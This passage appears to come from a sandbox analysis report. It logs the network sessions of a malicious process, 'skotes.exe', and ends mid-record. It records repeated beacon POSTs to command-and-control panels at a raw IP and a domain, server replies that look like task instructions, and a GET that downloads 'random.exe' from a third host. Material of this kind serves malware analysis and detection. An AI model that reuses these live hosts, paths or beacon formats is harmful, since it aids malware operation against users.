Dec 13, 2024 18:57:19.080310106 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:20.469929934 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.7	50206	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:22.217457056 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:23.577941895 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.7	50207	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:25.214809895 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:26.562941074 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.7	50208	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:28.319335938 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:29.684642076 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.7	50209	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:31.329684973 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:32.687110901 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.7	50210	89.35.131.209	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:31.968663931 CET	161	OUT	POST /3ofn3jf3e2ljk/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sanboxland.pro Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:33.275942087 CET	197	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 8 <c>3<d>0
Dec 13, 2024 18:57:34.784769058 CET	321	OUT	POST /3ofn3jf3e2ljk/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sanboxland.pro Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 45 36 31 31 36 44 30 38 39 33 37 30 39 35 36 46 31 45 44 46 46 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 31 45 41 42 42 46 45 39 41 32 45 45 45 45 41 34 44 34 39 46 31 33 44 35 34 38 30 33 42 42 42 37 36 45 37 31 39 39 30 30 32 44 42 43 43 30 43 42 39 35 33 31 30 34 45 42 36 46 44 42 30 33 32 30 43 43 35 46 33 38 42 43 46 44 45 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FE6116D089370956F1EDFF6102794AFA17E4CADC3DDBE1EABBFE9A2EEEEA4D49F13D54803BBB76E7199002DBCC0CB953104EB6FDB0320CC5F38BCFDE
Dec 13, 2024 18:57:35.190274000 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.7	50211	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:34.425810099 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:35.792762041 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.7	50212	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:37.421752930 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:38.994268894 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.7	50213	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:40.739819050 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:42.072833061 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.7	50214	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:43.717398882 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:45.069392920 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.7	50215	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:46.811485052 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:48.203586102 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.7	50216	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:49.847033024 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:51.228957891 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.7	50217	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:52.966820955 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:57:54.335206985 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.7	50218	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:55.962255955 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:57:57.536024094 CET	297	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 62 0d 0a 20 3c 63 3e 31 30 31 34 38 38 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 65 37 31 39 31 34 65 35 34 61 36 31 63 66 36 34 64 34 61 34 38 35 61 39 35 39 32 65 31 30 30 62 37 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b <c>1014887001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e100b7#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.7	50220	31.41.244.11	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:57:57.660993099 CET	144	OUT	GET /files/encoxx/random.exe HTTP/1.1 Host: 31.41.244.11 If-Modified-Since: Thu, 12 Dec 2024 07:55:00 GMT If-None-Match: "675a96d4-60200"
Dec 13, 2024 18:57:58.991362095 CET	191	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:57:58 GMT Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT Connection: keep-alive ETag: "675a96d4-60200"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.7	50222	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:01.292937994 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 38 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014887001&unit=246122658369
Dec 13, 2024 18:58:02.638314962 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.7	50224	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:04.390911102 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:58:05.845364094 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.7	50227	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:07.471573114 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:58:08.930953979 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.7	50229	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:10.671569109 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:58:12.075468063 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.7	50231	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:13.707971096 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:58:15.109559059 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.7	50243	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:16.941000938 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 18:58:18.286823988 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.7	50251	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 18:58:19.917833090 CET	316	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Dec 13, 2024 18:58:21.255219936 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 13 Dec 2024 17:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.7	50257	185.215.113.43	80	8028	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
